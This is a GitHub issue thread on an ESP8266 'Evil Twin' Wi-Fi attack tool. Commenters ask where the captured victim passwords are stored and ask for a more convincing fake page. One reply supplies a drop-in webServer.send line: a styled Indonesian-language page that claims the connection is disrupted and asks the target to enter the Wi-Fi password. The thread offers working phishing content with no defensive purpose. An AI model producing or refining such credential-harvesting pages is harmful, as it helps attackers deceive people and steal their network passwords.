M1z23R/ESP8266-EvilTwin #24: Password not saved

MDRafi08642, 2021-12-01:
Where to see saved password...???

And please update evil-twin html page for more realistic....

wisnusatriyo, 2021-12-04:
Change this line:
webServer.send(200, "text/html", "<!DOCTYPE html> <html><body><h2>Router '" + _selectedNetwork.ssid + "' needs to be updated</h2><form action='/'><label for='password'>Password:</label><br>  <input type='text' id='password' name='password' value='' minlength='8'><br>  <input type='submit' value='Submit'> </form> </body> </html>");

with this (you may change the language):

webServer.send(200, "text/html", "<!DOCTYPE html> <html>\n\n <head>\n  <title>Login</title>\n  <link href=\"https://fonts.googleapis.com/css?family=Raleway\" rel=\"stylesheet\">\n  <style>   \n\n#card {\n        background: #fbfbfb;\n        border-radius: 8px;\n        box-shadow: 1px 2px 8px rgba(0, 0, 0, 0.65);\n        height: 410px;\n        margin: 6rem auto 8.1rem auto;\n        width: 329px;\n}\n\nbody {\n       background: -webkit-linear-gradient(bottom, #2dbd6e, #a6f77b);\n       background-repeat: no-repeat;\n}\n\n\n#card-content {\n      padding: 12px 44px;\n}\n#card-title {\n      font-family: \"Raleway Thin\", sans-serif;\n      letter-spacing: 4px;\n      padding-bottom: 23px;\n      padding-top: 13px;\n      text-align: center;\n}\n.underline-title {\n      background: -webkit-linear-gradient(right, #a6f77b, #2ec06f);\n      height: 2px;\n      margin: -1.1rem auto 0 auto;\n      width: 89px;\n}\n\na {\n    text-decoration: none;\n}\nlabel {\n    font-family: \"Raleway\", sans-serif;\n    font-size: 11pt;\n}\n#forgot-pass {\n    color: #2dbd6e;\n    font-family: \"Raleway\", sans-serif;\n    font-size: 10pt;\n    margin-top: 3px;\n    text-align: right;\n}\n.form {\n    align-items: left;\n    display: flex;\n    flex-direction: column;\n}\n.form-border {\n    background: -webkit-linear-gradient(right, #a6f77b, #2ec06f);\n    height: 1px;\n    width: 100%;\n}\n.form-content {\n    background: #fbfbfb;\n    border: none;\n    outline: none;\n    padding-top: 14px;\n}\n\n  </style>\n </head>\n <body>\n \t \t<div id=\"card\"> \n<div id=\"card-content\">\n  <div id=\"card-title\">\n    <h3>KONEKSI TERGANGGU</h3>\n    <div class=\"underline-title\"></div>\n  </div>\n \t \t</div> \n </body>\n\n<body><h3><center>Mohon masukkan password '" + _selectedNetwork.ssid + "'untuk memperbaharui<center></h3><form action='/'><h3><label for='password'><center>Password Wifi Anda :</label><br>  <input type='text' id='password' name='password' value='' minlength='8'><br>  <input type='submit' value='Lanjutkan'> <center></form> </body> <h2></html>");

cakralithium, 2022-02-07:
niat program ini pakai pushbutton gimana yah.. kalau oled sih dah bisa.. mau full oled+button . udah ga pakai hp